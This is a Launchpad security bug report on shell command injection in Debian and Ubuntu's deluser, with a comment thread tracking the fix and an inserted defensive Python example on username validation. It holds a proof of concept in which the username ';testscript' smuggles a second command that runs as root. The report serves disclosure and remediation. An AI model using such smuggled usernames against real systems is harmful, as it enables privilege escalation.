adduser & deluser shell command injection

Bug #1838489 reported by Haoxi Tan
Affects           Status        Importance  Assigned to  Milestone
adduser (Debian)  Fix Released  Unknown
adduser (Ubuntu)  Fix Released  Undecided   Unassigned

Bug Description

The deluser program is vulnerable to command injection when a user has been added via adduser with special characters (such as ';') in the name. It is only possible when the user exists on the system (adduser does not prevent usernames containing ';' from being added).

This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible.

-------------- Proof of concept ----------------

# ll /test-file
ls: cannot access '/test-file': No such file or directory

# cat /usr/bin/testscript
#!/bin/bash
touch /test-file

# deluser
Enter a user name to remove: ;testscript
no crontab for root
crontab: usage error: no arguments permitted after this option
usage: crontab [-u user] file
        crontab [ -u user ] [ -i ] { -e | -l | -r }
                (default operation is replace, per 1003.2)
        -e (edit user's crontab)
        -l (list user's crontab)
        -r (delete user's crontab)
        -i (prompt before deleting user's crontab)
/usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.
(failed reverse-i-search)`': deluser^C
 # ll /test-file
-rw------- 1 root root 0 Jul 31 10:25 /test-file

-------- system description --------

Description: Ubuntu 18.04.2 LTS
Release: 18.04

# apt-cache policy adduser
adduser:
  Installed: 3.116ubuntu1
  Candidate: 3.116ubuntu1
  Version table:
 *** 3.116ubuntu1 500
        500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
        100 /var/lib/dpkg/status
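
A defender's view of the injection point, as an added example that is not part of the bug report or of the adduser package: it tokenises the command line the way a POSIX shell would, shows why `;testscript` becomes a second command, and contrasts that with a username whitelist plus an argv list that never reaches a shell. The regex and the 32-character limit are assumptions for illustration, not adduser's own NAME_REGEX.

```python
import re
import shlex
import subprocess
from typing import List

# Portable username pattern: lowercase start, then [a-z0-9_-], optional
# trailing '$' for machine accounts. Assumption for this example only;
# adduser's real NAME_REGEX is configurable and may differ.
NAME_RE = re.compile(r"[a-z_][a-z0-9_-]*\$?")
MAX_USERNAME_LEN = 32


def is_safe_username(name: str) -> bool:
    """Accept only names that cannot carry shell metacharacters."""
    return (0 < len(name) <= MAX_USERNAME_LEN
            and NAME_RE.fullmatch(name) is not None)


def vulnerable_cmdline(user: str) -> str:
    """The pattern the report's error message reveals: the name is pasted
    into one string that a shell parses later, so ';' ends the crontab
    command and whatever follows is run as a separate command."""
    return f"/usr/bin/crontab -r {user}"


def shell_commands(cmdline: str) -> List[List[str]]:
    """Tokenise like a POSIX shell and split on ';' to show what the shell
    would run. Nothing is executed here."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands: List[List[str]] = [[]]
    for tok in lexer:
        if tok == ";":
            commands.append([])
        else:
            commands[-1].append(tok)
    return [c for c in commands if c]


def safe_argv(user: str) -> List[str]:
    """Hardened form: validate first, then build an argv list so the name
    is exactly one literal argument and no shell ever interprets it."""
    if not is_safe_username(user):
        raise ValueError(f"refusing unsafe username: {user!r}")
    return ["/usr/bin/crontab", "-r", user]


def remove_crontab(user: str) -> int:
    """Run crontab -r by absolute path, without a shell (the default)."""
    return subprocess.run(safe_argv(user), check=False).returncode
```

`shell_commands(vulnerable_cmdline(";testscript"))` yields two commands, `/usr/bin/crontab -r` and `testscript`, which is exactly the split the report's PoC observed; `safe_argv` rejects the same input before any process is started.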

Revision history for this message
Mike Salvatore (mikesalvatore) wrote :

A similar bug was created in 2011 but got no attention. https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/782170

It looks to me like the upstream version in Debian is also susceptible. Could you file a bug with Debian as well? https://www.debian.org/Bugs/Reporting

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Hi, have you filed a bug with Debian yet? Thanks!

Revision history for this message
Haoxi Tan (h4sh5) wrote : Re: [Bug 1838489] Re: adduser & deluser shell command injection

No, I haven't had time to do that. Will update you when I do.
On Fri, 23 Aug 2019 at 11:16 pm, Marc Deslauriers <email address hidden> wrote:

> Hi, have you filed a bug with Debian yet? Thanks!

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Hi! Have you had a chance to report this issue to Debian?

Changed in adduser (Ubuntu):
status: New → Incomplete
information type: Private Security → Public Security
Revision history for this message
Haoxi Tan (h4sh5) wrote :

Hi Marc,
I will do it tonight. Will tell you once it’s done :)

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <email address hidden> wrote:

> Hi! Have you had a chance to report this issue to Debian?

Revision history for this message
Haoxi Tan (h4sh5) wrote :

Hi,

I have reported this bug to Debian:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577

Warm regards,
Haoxi

On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers <email address hidden> wrote:

> Hi! Have you had a chance to report this issue to Debian?

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Thanks!

Changed in adduser (Ubuntu):
status: Incomplete → Confirmed
Changed in adduser (Debian):
status: Unknown → New
Changed in adduser (Debian):
status: New → Confirmed
Changed in adduser (Debian):
status: Confirmed → Fix Committed
Changed in adduser (Debian):
status: Fix Committed → Fix Released
Revision history for this message
Benjamin Drung (bdrung) wrote :

It's fixed in Debian by version 3.121 and therefore fixed in adduser 3.121ubuntu1 in Ubuntu 22.10 (kinetic).

Changed in adduser (Ubuntu):
status: Confirmed → Fix Released